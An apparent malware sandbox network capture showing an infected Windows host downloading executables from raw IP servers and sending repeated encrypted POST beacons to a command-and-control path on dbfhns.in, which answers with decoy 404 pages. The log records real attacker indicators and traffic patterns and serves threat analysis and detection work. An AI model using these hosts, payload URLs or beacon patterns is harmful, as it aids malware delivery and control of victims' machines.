                                                            11          192.168.2.8  53075        23.145.40.124   80                4084  C:\Windows\explorer.exe
                                                            Timestamp                             Bytes transferred  Direction  Data
                                                            May 27, 2024 15:23:41.498828888 CEST  164                OUT        GET /pintxi1lv.exe HTTP/1.1
                                                            Connection: Keep-Alive
                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                            Host: 23.145.40.124


                                                            Session ID  Source IP    Source Port  Destination IP  Destination Port  PID   Process
                                                            12          192.168.2.8  53078        185.235.137.54  80                7992  C:\Users\user\AppData\Local\Temp\5876.exe
                                                            Timestamp                             Bytes transferred  Direction  Data
                                                            May 27, 2024 15:23:44.409686089 CEST  205                OUT        GET /file/host_so.exe HTTP/1.1
                                                            Connection: Keep-Alive
                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                            Host: 185.235.137.54


                                                            Session ID  Source IP    Source Port  Destination IP  Destination Port  PID   Process
                                                            13          192.168.2.8  53079        109.175.29.39   80                4084  C:\Windows\explorer.exe
                                                            Timestamp                             Bytes transferred  Direction  Data
                                                            May 27, 2024 15:24:02.901340961 CEST  281                OUT        POST /tmp/index.php HTTP/1.1
                                                            Connection: Keep-Alive
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Accept: */*
                                                            Referer: http://bshlmattfttfdb.com/
                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                            Content-Length: 269
                                                            Host: dbfhns.in
                                                            May 27, 2024 15:24:02.901366949 CEST  269                OUT        Data Raw: 3b 6e 26 14 86 c2 6a 21 df aa c0 77 72 06 7c b9 7e 0e bc 94 18 74 92 67 0d 7d 0e 90 47 b0 c3 6d 9f 2c b6 5a 07 6d 20 6c ea ea 3f cb 3a 35 d4 f1 7b d7 4a 37 ef 20 0f f7 4d 40 17 7f 4e e2 19 1d c7 41 20 ff 2d 5b 02 6b 2c 90 f5 76 0b 75 2a 1c a3 e8
                                                            Data Ascii: ;n&j!wr|~tg}Gm,Zm l?:5{J7 M@NA -[k,vu*5yx!f\!*wZl'zvF@o S+B*5fhnr\&%ThE'4olrzd_7R$
                                                            May 27, 2024 15:24:03.708252907 CEST  484                IN         HTTP/1.1 404 Not Found
                                                            Server: nginx/1.26.0
                                                            Date: Mon, 27 May 2024 13:24:03 GMT
                                                            Content-Type: text/html; charset=utf-8
                                                            Connection: close
                                                            Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>


                                                            Session ID  Source IP    Source Port  Destination IP  Destination Port  PID   Process
                                                            14          192.168.2.8  53080        109.175.29.39   80                4084  C:\Windows\explorer.exe
                                                            Timestamp                             Bytes transferred  Direction  Data
                                                            May 27, 2024 15:24:03.722157001 CEST  281                OUT        POST /tmp/index.php HTTP/1.1
                                                            Connection: Keep-Alive
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Accept: */*
                                                            Referer: http://bngikvknmtdpor.org/
                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                            Content-Length: 135
                                                            Host: dbfhns.in
                                                            May 27, 2024 15:24:03.722189903 CEST  135                OUT        Data Raw: 3b 6e 26 14 86 c2 6a 21 df aa c0 77 72 06 7c b9 7e 0e bc 94 18 74 92 67 0d 7d 0e 90 47 b0 c3 6d 9f 2c b6 5a 07 6d 20 6c ea ea 3f cb 3a 35 d4 f1 7b d7 4a 37 ef 20 0f f7 4d 40 17 7f 4e e2 19 1d c7 41 20 ff 2d 5b 03 6b 2c 90 f5 76 0b 75 37 43 c3 9a
                                                            Data Ascii: ;n&j!wr|~tg}Gm,Zm l?:5{J7 M@NA -[k,vu7C^}{X~IyS?80s}_dS.
                                                            May 27, 2024 15:24:04.526226997 CEST  210                IN         HTTP/1.1 404 Not Found
                                                            Server: nginx/1.26.0
                                                            Date: Mon, 27 May 2024 13:24:04 GMT
                                                            Content-Type: text/html; charset=utf-8
                                                            Connection: close
                                                            Data Raw: 00 00 d8 80 d7 bd 9d d9 a1 98 be 23 cd c5 88 81 d0 9e 5c 20 5a 24 14 a4 6a 44 a9 ab 14 bd cc b1 fb 6d 87 2a d3 ab 77 5f 07 98 d9 8a da 63 c6 2a 1d 01 8b 0a 8c 5e 6e 55 53 b5 91 73 f2 73 ed 44 19 13
                                                            Data Ascii: #\ Z$jDm*w_c*^nUSssD


                                                            Session ID  Source IP    Source Port  Destination IP  Destination Port  PID   Process
                                                            15          192.168.2.8  53081        91.202.233.231  80                4084  C:\Windows\explorer.exe
                                                            Timestamp                             Bytes transferred  Direction  Data
                                                            May 27, 2024 15:24:04.539113998 CEST  184                OUT        GET /sdf34ert3etgrthrthfghfghjfgh.exe HTTP/1.1
                                                            Connection: Keep-Alive
                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                            Host: 91.202.233.231
                                                            May 27, 2024 15:24:05.259747028 CEST  1236               IN         HTTP/1.1 200 OK
                                                            Date: Mon, 27 May 2024 13:24:05 GMT
                                                            Server: Apache/2.4.41 (Ubuntu)
                                                            Last-Modified: Mon, 27 May 2024 13:22:08 GMT
                                                            ETag: "1e5000-6196f67744000"
                                                            Accept-Ranges: bytes
                                                            Content-Length: 1986560
                                                            Keep-Alive: timeout=5, max=100
                                                            Connection: Keep-Alive
                                                            Content-Type: application/x-msdos-program


                                                            Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                            16 | 192.168.2.8 | 53083 | 109.175.29.39 | 80 | 4084 | C:\Windows\explorer.exe
                                                            Timestamp | Bytes transferred | Direction | Data
                                                            May 27, 2024 15:24:07.131321907 CEST | 280 | OUT | POST /tmp/index.php HTTP/1.1
                                                            Connection: Keep-Alive
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Accept: */*
                                                            Referer: http://amkihwobrgvem.org/
                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                            Content-Length: 340
                                                            Host: dbfhns.in
                                                            May 27, 2024 15:24:07.927280903 CEST | 484 | IN | HTTP/1.1 404 Not Found
                                                            Server: nginx/1.26.0
                                                            Date: Mon, 27 May 2024 13:24:07 GMT
                                                            Content-Type: text/html; charset=utf-8
                                                            Connection: close
                                                            Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>


                                                            Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                            17 | 192.168.2.8 | 53084 | 109.175.29.39 | 80 | 4084 | C:\Windows\explorer.exe
                                                            Timestamp | Bytes transferred | Direction | Data
                                                            May 27, 2024 15:24:08.932496071 CEST | 282 | OUT | POST /tmp/index.php HTTP/1.1
                                                            Connection: Keep-Alive
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Accept: */*
                                                            Referer: http://bdtrshdmdsajiin.net/
                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                            Content-Length: 338
                                                            Host: dbfhns.in
                                                            May 27, 2024 15:24:09.734002113 CEST | 484 | IN | HTTP/1.1 404 Not Found
                                                            Server: nginx/1.26.0
                                                            Date: Mon, 27 May 2024 13:24:09 GMT
                                                            Content-Type: text/html; charset=utf-8
                                                            Connection: close
                                                            Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>


                                                            Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                            18 | 192.168.2.8 | 53115 | 109.175.29.39 | 80 | 4084 | C:\Windows\explorer.exe
                                                            Timestamp | Bytes transferred | Direction | Data
                                                            May 27, 2024 15:25:21.588725090 CEST | 278 | OUT | POST /tmp/index.php HTTP/1.1
                                                            Connection: Keep-Alive
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Accept: */*
                                                            Referer: http://depvhlbmmte.com/
                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                            Content-Length: 357
                                                            Host: dbfhns.in
                                                            May 27, 2024 15:25:22.409034014 CEST | 151 | IN | HTTP/1.1 404 Not Found
                                                            Server: nginx/1.26.0
                                                            Date: Mon, 27 May 2024 13:25:22 GMT
                                                            Content-Type: text/html; charset=utf-8
                                                            Connection: close
                                                            Data Raw: 03 00 00 00 72 e8 84
                                                            Data Ascii: r


                                                            Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                            19 | 192.168.2.8 | 53116 | 109.175.29.39 | 80 | 4084 | C:\Windows\explorer.exe
                                                            Timestamp | Bytes transferred | Direction | Data
                                                            May 27, 2024 15:25:27.096781015 CEST | 282 | OUT | POST /tmp/index.php HTTP/1.1
                                                            Connection: Keep-Alive
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Accept: */*
                                                            Referer: http://barvntqgmwgcruw.net/
                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                            Content-Length: 358
                                                            Host: dbfhns.in
                                                            May 27, 2024 15:25:27.903228998 CEST | 151 | IN | HTTP/1.1 404 Not Found
                                                            Server: nginx/1.26.0
                                                            Date: Mon, 27 May 2024 13:25:27 GMT
                                                            Content-Type: text/html; charset=utf-8
                                                            Connection: close
                                                            Data Raw: 03 00 00 00 72 e8 84
                                                            Data Ascii: r


                                                            Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                            20 | 192.168.2.8 | 53117 | 109.175.29.39 | 80 | 4084 | C:\Windows\explorer.exe
                                                            Timestamp | Bytes transferred | Direction | Data
                                                            May 27, 2024 15:25:32.321607113 CEST | 280 | OUT | POST /tmp/index.php HTTP/1.1
                                                            Connection: Keep-Alive
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Accept: */*
                                                            Referer: http://cmmajutpfcykk.com/
                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                            Content-Length: 277
                                                            Host: dbfhns.in
                                                            May 27, 2024 15:25:33.123317957 CEST | 151 | IN | HTTP/1.1 404 Not Found
                                                            Server: nginx/1.26.0
                                                            Date: Mon, 27 May 2024 13:25:33 GMT
                                                            Content-Type: text/html; charset=utf-8
                                                            Connection: close
                                                            Data Raw: 03 00 00 00 72 e8 84
                                                            Data Ascii: r


                                                            Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                            21 | 192.168.2.8 | 53118 | 109.175.29.39 | 80 | 4084 | C:\Windows\explorer.exe
                                                            Timestamp | Bytes transferred | Direction | Data
                                                            May 27, 2024 15:25:39.368552923 CEST | 278 | OUT | POST /tmp/index.php HTTP/1.1
                                                            Connection: Keep-Alive
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Accept: */*
                                                            Referer: http://jrlquvadpwx.org/
                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                            Content-Length: 128
                                                            Host: dbfhns.in
                                                            May 27, 2024 15:25:40.166234970 CEST | 151 | IN | HTTP/1.1 404 Not Found
                                                            Server: nginx/1.26.0
                                                            Date: Mon, 27 May 2024 13:25:40 GMT
                                                            Content-Type: text/html; charset=utf-8
                                                            Connection: close
                                                            Data Raw: 03 00 00 00 72 e8 84
                                                            Data Ascii: r


                                                            Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                            22 | 192.168.2.8 | 53119 | 109.175.29.39 | 80 | 4084 | C:\Windows\explorer.exe
                                                            Timestamp | Bytes transferred | Direction | Data
                                                            May 27, 2024 15:25:44.351947069 CEST | 279 | OUT | POST /tmp/index.php HTTP/1.1
                                                            Connection: Keep-Alive
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Accept: */*
                                                            Referer: http://lmlmhdjgxcsr.com/
                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                            Content-Length: 228
                                                            Host: dbfhns.in
                                                            May 27, 2024 15:25:45.166171074 CEST | 151 | IN | HTTP/1.1 404 Not Found
                                                            Server: nginx/1.26.0
                                                            Date: Mon, 27 May 2024 13:25:45 GMT
                                                            Content-Type: text/html; charset=utf-8
                                                            Connection: close
                                                            Data Raw: 03 00 00 00 72 e8 84
                                                            Data Ascii: r


                                                            Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                            23 | 192.168.2.8 | 53120 | 109.175.29.39 | 80 | 4084 | C:\Windows\explorer.exe
                                                            Timestamp | Bytes transferred | Direction | Data
                                                            May 27, 2024 15:25:49.165527105 CEST | 279 | OUT | POST /tmp/index.php HTTP/1.1
                                                            Connection: Keep-Alive
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Accept: */*
                                                            Referer: http://dhyltqofxhpe.net/
                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                            Content-Length: 260
                                                            Host: dbfhns.in
                                                            May 27, 2024 15:25:49.971698999 CEST | 151 | IN | HTTP/1.1 404 Not Found
                                                            Server: nginx/1.26.0
                                                            Date: Mon, 27 May 2024 13:25:49 GMT
                                                            Content-Type: text/html; charset=utf-8
                                                            Connection: close
                                                            Data Raw: 03 00 00 00 72 e8 84
                                                            Data Ascii: r


                                                            Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                            24 | 192.168.2.8 | 53121 | 109.175.29.39 | 80 | 4084 | C:\Windows\explorer.exe
                                                            Timestamp | Bytes transferred | Direction | Data
                                                            May 27, 2024 15:25:56.339915991 CEST | 278 | OUT | POST /tmp/index.php HTTP/1.1
                                                            Connection: Keep-Alive
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Accept: */*
                                                            Referer: http://nxoumlltphj.com/
                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                            Content-Length: 196
                                                            Host: dbfhns.in
                                                            May 27, 2024 15:25:57.146100044 CEST | 151 | IN | HTTP/1.1 404 Not Found
                                                            Server: nginx/1.26.0
                                                            Date: Mon, 27 May 2024 13:25:57 GMT
                                                            Content-Type: text/html; charset=utf-8
                                                            Connection: close
                                                            Data Raw: 03 00 00 00 72 e8 84
                                                            Data Ascii: r


                                                            Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                            25 | 192.168.2.8 | 53122 | 109.175.29.39 | 80 | 4084 | C:\Windows\explorer.exe
                                                            Timestamp | Bytes transferred | Direction | Data
                                                            May 27, 2024 15:26:00.859899044 CEST | 282 | OUT | POST /tmp/index.php HTTP/1.1
                                                            Connection: Keep-Alive
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Accept: */*
                                                            Referer: http://etetxpvheghmlur.net/
                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                            Content-Length: 272
                                                            Host: dbfhns.in
                                                            May 27, 2024 15:26:01.661735058 CEST | 151 | IN | HTTP/1.1 404 Not Found
                                                            Server: nginx/1.26.0
                                                            Date: Mon, 27 May 2024 13:26:01 GMT
                                                            Content-Type: text/html; charset=utf-8
                                                            Connection: close
                                                            Data Raw: 03 00 00 00 72 e8 84
                                                            Data Ascii: r


                                                            Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                            26 | 192.168.2.8 | 53123 | 109.175.29.39 | 80 | 4084 | C:\Windows\explorer.exe
                                                            Timestamp | Bytes transferred | Direction | Data
                                                            May 27, 2024 15:26:05.875359058 CEST | 278 | OUT | POST /tmp/index.php HTTP/1.1
                                                            Connection: Keep-Alive
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Accept: */*
                                                            Referer: http://spdxbqopubx.org/
                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                            Content-Length: 283
                                                            Host: dbfhns.in
                                                            May 27, 2024 15:26:06.708801031 CEST | 151 | IN | HTTP/1.1 404 Not Found
                                                            Server: nginx/1.26.0
                                                            Date: Mon, 27 May 2024 13:26:06 GMT
                                                            Content-Type: text/html; charset=utf-8
                                                            Connection: close
                                                            Data Raw: 03 00 00 00 72 e8 84
                                                            Data Ascii: r


                                                            Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                            27 | 192.168.2.8 | 53124 | 190.147.128.172 | 80 | 4084 | C:\Windows\explorer.exe
                                                            Timestamp | Bytes transferred | Direction | Data
                                                            May 27, 2024 15:26:13.597836018 CEST | 283 | OUT | POST /tmp/index.php HTTP/1.1
                                                            Connection: Keep-Alive
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Accept: */*
                                                            Referer: http://pxinixbdcjjccvdo.com/
                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                            Content-Length: 343
                                                            Host: dbfhns.in
                                                            May 27, 2024 15:26:14.643624067 CEST | 151 | IN | HTTP/1.1 404 Not Found
                                                            Server: nginx/1.26.0
                                                            Date: Mon, 27 May 2024 13:26:14 GMT
                                                            Content-Type: text/html; charset=utf-8
                                                            Connection: close
                                                            Data Raw: 03 00 00 00 72 e8 84
                                                            Data Ascii: r


                                                            Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                            28 | 192.168.2.8 | 53125 | 190.147.128.172 | 80 | 4084 | C:\Windows\explorer.exe
                                                            Timestamp | Bytes transferred | Direction | Data
                                                            May 27, 2024 15:26:19.087512970 CEST | 279 | OUT | POST /tmp/index.php HTTP/1.1
                                                            Connection: Keep-Alive
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Accept: */*
                                                            Referer: http://euirtythbemo.net/
                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                            Content-Length: 326
                                                            Host: dbfhns.in
                                                            May 27, 2024 15:26:19.087548971 CEST | 326 | OUT | Data Raw: 3b 6e 26 14 86 c2 6a 21 df aa c0 77 72 06 7c b9 7e 0e bc 94 18 74 92 67 0d 7d 0e 90 47 b0 c3 6d 9f 2c b6 5a 07 6d 20 6c ea ea 3f cb 3a 35 d4 f1 7b d7 4a 37 ef 20 0f f7 4d 40 17 7f 4e e2 19 1d c7 41 20 ff 2e 5b 0a 6b 2c 90 f4 76 0b 75 33 22 cb f6
                                                            Data Ascii: ;n&j!wr|~tg}Gm,Zm l?:5{J7 M@NA .[k,vu3"EEdL~jm7>TJ?7_'}!f>=$M)%p2=*LY;6k;z{T@~D{m_-
                                                            May 27, 2024 15:26:20.152513981 CEST | 151 | IN | HTTP/1.1 404 Not Found
                                                            Server: nginx/1.26.0
                                                            Date: Mon, 27 May 2024 13:26:19 GMT
                                                            Content-Type: text/html; charset=utf-8
                                                            Connection: close
                                                            Data Raw: 03 00 00 00 72 e8 84
                                                            Data Ascii: r


                                                            Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                            29 | 192.168.2.8 | 53126 | 190.147.128.172 | 80 | 4084 | C:\Windows\explorer.exe
                                                            Timestamp | Bytes transferred | Direction | Data
                                                            May 27, 2024 15:26:24.246699095 CEST | 280 | OUT | POST /tmp/index.php HTTP/1.1
                                                            Connection: Keep-Alive
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Accept: */*
                                                            Referer: http://btndjessgdxlt.net/
                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                            Content-Length: 359
                                                            Host: dbfhns.in
                                                            May 27, 2024 15:26:24.246716022 CEST | 359 | OUT | Data Raw: 3b 6e 26 14 86 c2 6a 21 df aa c0 77 72 06 7c b9 7e 0e bc 94 18 74 92 67 0d 7d 0e 90 47 b0 c3 6d 9f 2c b6 5a 07 6d 20 6c ea ea 3f cb 3a 35 d4 f1 7b d7 4a 37 ef 20 0f f7 4d 40 17 7f 4e e2 19 1d c7 41 20 ff 2e 5b 0a 6b 2c 90 f4 76 0b 75 2d 58 e1 82
                                                            Data Ascii: ;n&j!wr|~tg}Gm,Zm l?:5{J7 M@NA .[k,vu-XR@Dt;hSx=1Wue`c#@Ot;$,0RT?h0QMW~b}NuKQEG6gdRO5t_G,%
                                                            May 27, 2024 15:26:25.384758949 CEST | 151 | IN | HTTP/1.1 404 Not Found
                                                            Server: nginx/1.26.0
                                                            Date: Mon, 27 May 2024 13:26:25 GMT
                                                            Content-Type: text/html; charset=utf-8
                                                            Connection: close
                                                            Data Raw: 03 00 00 00 72 e8 84
                                                            Data Ascii: r


                                                            Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                            30 | 192.168.2.8 | 53127 | 190.147.128.172 | 80 | 4084 | C:\Windows\explorer.exe
                                                            Timestamp | Bytes transferred | Direction | Data
                                                            May 27, 2024 15:26:32.065397024 CEST | 283 | OUT | POST /tmp/index.php HTTP/1.1
                                                            Connection: Keep-Alive
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Accept: */*
                                                            Referer: http://nfymgppnbopwxnwd.net/
                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                            Content-Length: 215
                                                            Host: dbfhns.in
                                                            May 27, 2024 15:26:32.065406084 CEST | 215 | OUT | Data Raw: 3b 6e 26 14 86 c2 6a 21 df aa c0 77 72 06 7c b9 7e 0e bc 94 18 74 92 67 0d 7d 0e 90 47 b0 c3 6d 9f 2c b6 5a 07 6d 20 6c ea ea 3f cb 3a 35 d4 f1 7b d7 4a 37 ef 20 0f f7 4d 40 17 7f 4e e2 19 1d c7 41 20 ff 2e 5b 0a 6b 2c 90 f4 76 0b 75 72 31 c1 83
                                                            Data Ascii: ;n&j!wr|~tg}Gm,Zm l?:5{J7 M@NA .[k,vur1b{S[59y)-p#cE*UD(/G>O"wr?;(nFK3OP\
                                                            May 27, 2024 15:26:33.151061058 CEST | 151 | IN | HTTP/1.1 404 Not Found
                                                            Server: nginx/1.26.0
                                                            Date: Mon, 27 May 2024 13:26:32 GMT
                                                            Content-Type: text/html; charset=utf-8
                                                            Connection: close
                                                            Data Raw: 03 00 00 00 72 e8 84
                                                            Data Ascii: r


                                                            Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                            31 | 192.168.2.8 | 53128 | 190.147.128.172 | 80 | 4084 | C:\Windows\explorer.exe
                                                            Timestamp | Bytes transferred | Direction | Data
                                                            May 27, 2024 15:26:37.380507946 CEST | 283 | OUT | POST /tmp/index.php HTTP/1.1
                                                            Connection: Keep-Alive
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Accept: */*
                                                            Referer: http://ckgltynaavllsolq.com/
                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                            Content-Length: 231
                                                            Host: dbfhns.in
                                                            May 27, 2024 15:26:37.380525112 CEST | 231 | OUT | Data Raw: 3b 6e 26 14 86 c2 6a 21 df aa c0 77 72 06 7c b9 7e 0e bc 94 18 74 92 67 0d 7d 0e 90 47 b0 c3 6d 9f 2c b6 5a 07 6d 20 6c ea ea 3f cb 3a 35 d4 f1 7b d7 4a 37 ef 20 0f f7 4d 40 17 7f 4e e2 19 1d c7 41 20 ff 2e 5b 0a 6b 2c 90 f4 76 0b 75 7b 0c ca e2
                                                            Data Ascii: ;n&j!wr|~tg}Gm,Zm l?:5{J7 M@NA .[k,vu{Q rKkB2cu=BQKN8IU+JFM&bF<$w8X,p\V~1iMJv)}
                                                            May 27, 2024 15:26:38.479953051 CEST | 151 | IN | HTTP/1.1 404 Not Found
                                                            Server: nginx/1.26.0
                                                            Date: Mon, 27 May 2024 13:26:38 GMT
                                                            Content-Type: text/html; charset=utf-8
                                                            Connection: close
                                                            Data Raw: 03 00 00 00 72 e8 84
                                                            Data Ascii: r


                                                            Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                            32 | 192.168.2.8 | 53129 | 190.147.128.172 | 80 | 4084 | C:\Windows\explorer.exe
                                                            Timestamp | Bytes transferred | Direction | Data
                                                            May 27, 2024 15:26:42.784524918 CEST | 278 | OUT | POST /tmp/index.php HTTP/1.1
                                                            Connection: Keep-Alive
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Accept: */*
                                                            Referer: http://hbtkypdfbiu.net/
                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                            Content-Length: 187
                                                            Host: dbfhns.in
                                                            May 27, 2024 15:26:42.784569025 CEST | 187 | OUT | Data Raw: 3b 6e 26 14 86 c2 6a 21 df aa c0 77 72 06 7c b9 7e 0e bc 94 18 74 92 67 0d 7d 0e 90 47 b0 c3 6d 9f 2c b6 5a 07 6d 20 6c ea ea 3f cb 3a 35 d4 f1 7b d7 4a 37 ef 20 0f f7 4d 40 17 7f 4e e2 19 1d c7 41 20 ff 2e 5b 0a 6b 2c 90 f4 76 0b 75 5d 02 a5 a9
                                                            Data Ascii: ;n&j!wr|~tg}Gm,Zm l?:5{J7 M@NA .[k,vu]\b}^2R'i4sm]Z<NS1(qK:&3,-FcH&c3
                                                            May 27, 2024 15:26:43.886503935 CEST | 151 | IN | HTTP/1.1 404 Not Found
                                                            Server: nginx/1.26.0
                                                            Date: Mon, 27 May 2024 13:26:43 GMT
                                                            Content-Type: text/html; charset=utf-8
                                                            Connection: close
                                                            Data Raw: 03 00 00 00 72 e8 84
                                                            Data Ascii: r


                                                            Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                            33 | 192.168.2.8 | 53130 | 190.147.128.172 | 80 | 4084 | C:\Windows\explorer.exe
                                                            Timestamp | Bytes transferred | Direction | Data
                                                            May 27, 2024 15:26:50.105824947 CEST | 280 | OUT | POST /tmp/index.php HTTP/1.1
                                                            Connection: Keep-Alive
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Accept: */*
                                                            Referer: http://haglmiwlgvefe.net/
                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                            Content-Length: 263
                                                            Host: dbfhns.in
                                                            May 27, 2024 15:26:50.105861902 CEST | 263 | OUT | Data Raw: 3b 6e 26 14 86 c2 6a 21 df aa c0 77 72 06 7c b9 7e 0e bc 94 18 74 92 67 0d 7d 0e 90 47 b0 c3 6d 9f 2c b6 5a 07 6d 20 6c ea ea 3f cb 3a 35 d4 f1 7b d7 4a 37 ef 20 0f f7 4d 40 17 7f 4e e2 19 1d c7 41 20 ff 2e 5b 0a 6b 2c 90 f4 76 0b 75 7c 50 cd 9f
                                                            Data Ascii: ;n&j!wr|~tg}Gm,Zm l?:5{J7 M@NA .[k,vu|PqR}`w&Cl?-<ok[0^1#S(27"*NFCO1.TJBi(kOfxG_x|nRJ%
                                                            May 27, 2024 15:26:51.223261118 CEST | 151 | IN | HTTP/1.1 404 Not Found
                                                            Server: nginx/1.26.0
                                                            Date: Mon, 27 May 2024 13:26:51 GMT
                                                            Content-Type: text/html; charset=utf-8
                                                            Connection: close
                                                            Data Raw: 03 00 00 00 72 e8 84
                                                            Data Ascii: r


                                                            Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                            34 | 192.168.2.8 | 53131 | 190.147.128.172 | 80 | 4084 | C:\Windows\explorer.exe
                                                            Timestamp | Bytes transferred | Direction | Data
                                                            May 27, 2024 15:26:55.402930021 CEST | 280 | OUT | POST /tmp/index.php HTTP/1.1
                                                            Connection: Keep-Alive
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Accept: */*
                                                            Referer: http://dnvpkenpnlmca.org/
                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                            Content-Length: 347
                                                            Host: dbfhns.in
                                                            May 27, 2024 15:26:55.402960062 CEST | 347 | OUT | Data Raw: 3b 6e 26 14 86 c2 6a 21 df aa c0 77 72 06 7c b9 7e 0e bc 94 18 74 92 67 0d 7d 0e 90 47 b0 c3 6d 9f 2c b6 5a 07 6d 20 6c ea ea 3f cb 3a 35 d4 f1 7b d7 4a 37 ef 20 0f f7 4d 40 17 7f 4e e2 19 1d c7 41 20 ff 2e 5b 0a 6b 2c 90 f4 76 0b 75 73 07 f1 8c
                                                            Data Ascii: ;n&j!wr|~tg}Gm,Zm l?:5{J7 M@NA .[k,vus\:i~=:c`Li9suG?n'0M<rO#joF0qB3b3@FS|t8@rsSa\x
                                                            May 27, 2024 15:26:56.507198095 CEST | 151 | IN | HTTP/1.1 404 Not Found
                                                            Server: nginx/1.26.0
                                                            Date: Mon, 27 May 2024 13:26:56 GMT
                                                            Content-Type: text/html; charset=utf-8
                                                            Connection: close
                                                            Data Raw: 03 00 00 00 72 e8 84
                                                            Data Ascii: r


